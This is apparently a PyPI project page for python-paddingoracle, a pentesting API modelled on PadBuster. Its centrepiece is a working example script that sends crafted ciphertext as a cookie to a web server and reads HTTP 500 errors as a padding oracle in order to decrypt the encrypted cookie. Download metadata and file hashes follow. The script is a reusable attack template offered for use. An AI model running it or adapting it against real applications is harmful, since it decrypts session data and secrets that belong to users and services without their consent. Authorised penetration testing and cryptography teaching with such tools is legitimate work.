A portable, padding oracle exploit API
Project description
python-paddingoracle is an API that provides pentesters a customizable alternative to PadBuster and other padding oracle exploit tools that can’t easily (without a heavy rewrite) be used in unique, per-app scenarios. Think non-HTTP applications, raw sockets, client applications, unique encodings, etc.
Usage:
To use the paddingoracle API, simply implement the oracle() method from the PaddingOracle API and raise a BadPaddingException when the decrypter reveals a padding oracle. To decrypt data, pass raw encrypted bytes to decrypt() with a block size (typically 8 or 16) and optional iv parameter.
See below for an example (from the example):
from paddingoracle import BadPaddingException, PaddingOracle from base64 import b64encode, b64decode from urllib import quote, unquote import requests import socket import time class PadBuster(PaddingOracle): def __init__(self, **kwargs): super(PadBuster, self).__init__(**kwargs) self.session = requests.Session() self.wait = kwargs.get('wait', 2.0) def oracle(self, data, **kwargs): somecookie = quote(b64encode(data)) self.session.cookies['somecookie'] = somecookie while 1: try: response = self.session.get('http://www.example.com/', stream=False, timeout=5, verify=False) break except (socket.error, requests.exceptions.RequestException): logging.exception('Retrying request in %.2f seconds...', self.wait) time.sleep(self.wait) continue self.history.append(response) if response.ok: logging.debug('No padding exception raised on %r', somecookie) return # An HTTP 500 error was returned, likely due to incorrect padding raise BadPaddingException if __name__ == '__main__': import logging import sys if not sys.argv[1:]: print 'Usage: %s <somecookie value>' % (sys.argv[0], ) sys.exit(1) logging.basicConfig(level=logging.DEBUG) encrypted_cookie = b64decode(unquote(sys.argv[1])) padbuster = PadBuster() cookie = padbuster.decrypt(encrypted_cookie, block_size=8, iv=bytearray(8)) print('Decrypted somecookie: %s => %r' % (sys.argv[1], cookie))
Credits
python-paddingoracle is a Python implementation heavily based on PadBuster, an automated script for performing Padding Oracle attacks, developed by Brian Holyfield of Gotham Digital Science.
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
File details
Details for the file paddingoracle-0.2.2.tar.gz
.
File metadata
- Download URL: paddingoracle-0.2.2.tar.gz
- Upload date:
- Size: 5.3 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 |
bfa836e7a9971484f6b44ad61972ed81adc58a1c4d1ecc11e090fa1e8849803d
|
|
MD5 |
f59e537b890a0ba6cbfaa9bd68dc5d50
|
|
BLAKE2b-256 |
748db12a6ce3e5e5f77a2d8513ae4f45b925741e83c5a116f6fbc79f987a5507
|
File details
Details for the file paddingoracle-0.2.2-py2-none-any.whl
.
File metadata
- Download URL: paddingoracle-0.2.2-py2-none-any.whl
- Upload date:
- Size: 5.6 kB
- Tags: Python 2
- Uploaded using Trusted Publishing? No
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 |
0a2432d8911f9d2e31d261585dba3af571b7d2e71971cb731360a25ccbeda8c2
|
|
MD5 |
eb6224f3fdda27a7b3c6d9f21f7c8541
|
|
BLAKE2b-256 |
4846198eaee3113990344c8260e9fca87e573d83fe08ca24db1d15a59cb3df8f
|